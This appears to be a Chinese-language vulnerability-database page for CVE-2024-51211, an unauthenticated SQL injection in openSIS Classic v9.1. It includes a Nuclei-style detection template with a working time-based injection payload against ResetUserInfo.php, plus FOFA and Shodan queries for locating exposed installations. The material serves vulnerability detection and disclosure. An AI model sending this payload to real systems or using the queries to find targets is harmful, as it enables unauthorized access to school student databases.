CVE-2024-51211: openSIS Classic v9.1 - SQL Injection

日期: 2025-08-01 | 影响软件: openSIS Classic v9.1 | POC: 已公开

漏洞描述

SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.

PoC代码[已公开]

id: CVE-2024-51211

info:
  name: openSIS Classic v9.1 - SQL Injection
  author: Haliteroglu
  severity: critical
  description: |
    SQL injection vulnerability exists in OS4ED openSIS-Classic Version 9.1, specifically in the resetuserinfo.php file. The vulnerability is due to improper input validation of the $username_stn_id parameter, which can be manipulated by an attacker to inject arbitrary SQL commands.
  reference:
    - https://github.com/kutsa1/My-CVE/tree/main/CVE-2024-51211
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51211
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-51211
    cwe-id: CWE-89
    epss-score: 0.0657
    epss-percentile: 0.90794
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="openSIS"
    shodan-query: title:"openSIS"
  tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /ResetUserInfo.php?user_type_form=username&uname_user_type=uname_student&username_stn_id=21+OR+3720%3dBENCHMARK(7000000,MD5(0x6e48446e))&pass=1&month_username_dob=x&day_username_dob=x&year_username_dob=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "contains_all(tolower(body), 'forgotpass.php', 'opensis')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100e7dd0e24b8b3fde2adaad919f9db1dc1393b9d471890d4f8b18979b1bfe0d119022100f6868a5b292e586c094219d4f648e755444f6c269bdbf855e964ef75190f227a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐